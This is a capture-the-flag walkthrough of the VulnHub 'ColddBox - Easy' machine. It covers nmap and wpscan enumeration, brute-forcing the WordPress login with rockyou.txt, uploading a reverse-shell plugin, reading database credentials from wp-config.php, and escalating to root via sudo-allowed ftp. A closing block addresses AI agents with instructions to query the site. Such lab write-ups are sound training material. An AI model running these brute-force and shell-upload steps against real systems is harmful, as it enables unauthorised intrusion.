# Colddbox - Easy

As the machine description says - this is a WordPress machine with an easy level of difficulty. Machine can be found here : [vulnhub](https://www.vulnhub.com/entry/colddbox-easy,586/). It's an interesting room and I enjoyed the Privilege escalation part most.&#x20;

### Enumeration:

1\) First I need to discover machines IP. I have used netdiscover and found the IP : 10.0.2.44

**`netdiscover -i eth0 -r 10.0.0.0/16`**

2\) First, searching all port using nmap: **`nmap -p- -v -T5 -Pn 10.0.2.44`**

```
PORT     STATE SERVICE
80/tcp   open  http
4512/tcp open  unknown
```

3\) Now scanning the services are running: **`nmap -sV -A -p 80,4512 -v 10.0.2.44`**

```
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
|   256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_  256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
```

4\) For Further enumeration, I have used another tool: enum4linux. Nothing found.

**`enum4linux -v 10.0.2.44`**

![Default web page](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXDS7otk0Kev3cCImQ%2F-MZXDqgk6ebatUtEFnVi%2Fimage.png?alt=media\&token=8e96f0bd-7d77-44b2-a44f-5d02f3ea3931)

5\) As the site is running WordPress, so I scan it. This scan gives me valuable info

**`wpscan -e -v --url`** [**`http://10.0.2.44/`**](http://10.0.2.44/)

```
[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://10.0.2.44/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.0.2.44/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
 |  - http://10.0.2.44/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[i] No plugins Found.
[i] No DB Exports Found.

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

6\) I need some more info in order to start any attack. So, enumerate the web more. I have tried directory listing using gobuster:&#x20;

**gobuster dir -u** [**http://10.0.2.44/**](http://10.0.2.44/) **-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt**&#x20;

```
===============================================================
/wp-content           (Status: 301) [Size: 311] [--> http://10.0.2.44/wp-content/]
/wp-includes          (Status: 301) [Size: 312] [--> http://10.0.2.44/wp-includes/]
/wp-admin             (Status: 301) [Size: 309] [--> http://10.0.2.44/wp-admin/]   
/hidden               (Status: 301) [Size: 307] [--> http://10.0.2.44/hidden/]     
/server-status        (Status: 403) [Size: 274]       
```

### Exploitation:

7\) I have found some interesting directory and username. So first try brute force the /wp-admin login page: **`wpscan --url`** [**`http://10.0.2.44`**](http://10.0.2.44) **`-e u -t 50 -P /usr/share/wordlists/rockyou.txt`**

This attack give me a - username: **c0ldd** and password: **9876543210**

Now I can log in with them.

![](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXDwSVjaOccVYEq45g%2F-MZXTy6gfKIEg16xfTb7%2Fimage.png?alt=media\&token=3cb1318b-174b-462e-8735-ce79a9591c21)

8\) There are 4 ways to get a reverse shell from the WordPress site.

* Upload shell through the Theme
* Upload shell through the Plugin
* Themes template into 404.php
* Using pre-installed Plugins into header.php

After some googling, I have found 2 well written article about getting a reverse shell. Reading them won't waste your time

* [WordPress Shell Upload](https://www.hacknos.com/wordpress-shell-upload/)
* [WordPress Plugin: Reverse Shell](https://www.sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell)

I have modified the code below (given my VM IP to connect back) and uploaded as a zip. This code successfully works as a plugin.

![Modified shell](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXXiOoRSpsK05zxzoc%2F-MZXZirgX2L3n6zAS9jv%2Fimage.png?alt=media\&token=76eae833-d145-4dc8-a37d-957408a474af)

9\) In my attack box I have started a listener and then just 'Activated' it from WordPress dashboard. And I get user access.

![](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXXiOoRSpsK05zxzoc%2F-MZX_1jZxNeyDky54zro%2Fimage.png?alt=media\&token=7675c9c6-dfc7-41e2-81a2-bb7953c13691)

### Privilege escalation:

(Failed attempt) I have tried these ways below and failed. So I noted them.

I was able to create folder in `/tmp`. So downloaded linpeas in `/tmp` but failed to execute. SUID finding command works: **`find / -perm -u=s -type f 2>/dev/null`**, but not useful. Python3 is running there.

10\) After so many failed attempt, I have tried the command below. Database leaked some info there: **`cat wp-config.php | grep DB`**

```
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
```

11\) DB password could work. So I started to try it, but neither there was any terminal open nor the sudo run access. So then I created a terminal using python3. I have marked them in the picture below

![](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXxawPOYhbaumWWHqf%2F-MZY7m7jN0SJ90bYqQ1X%2F16197918041286418.png?alt=media\&token=27771aa9-478e-4ce3-9ce1-b2ba0d0b8726)

12\) Further enumeration says, 3 service running as root: **`sudo -l`**

```
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
```

13\) Running Vim can also give me root access, but I have tried FTP. Running ftp and then /bin/bash.

![](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXgPTBab7JsOvrAOTd%2F-MZXh3SgX6QpHaqSAF2i%2Fimage.png?alt=media\&token=7e89a676-78f9-41ab-b156-75f6b147d2b4)

Thanks for reading. Hope this amazing CTF and write up will help you a lot.&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://meowsec.gitbook.io/vulnhub/easy-1/list1/colddbox-easy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.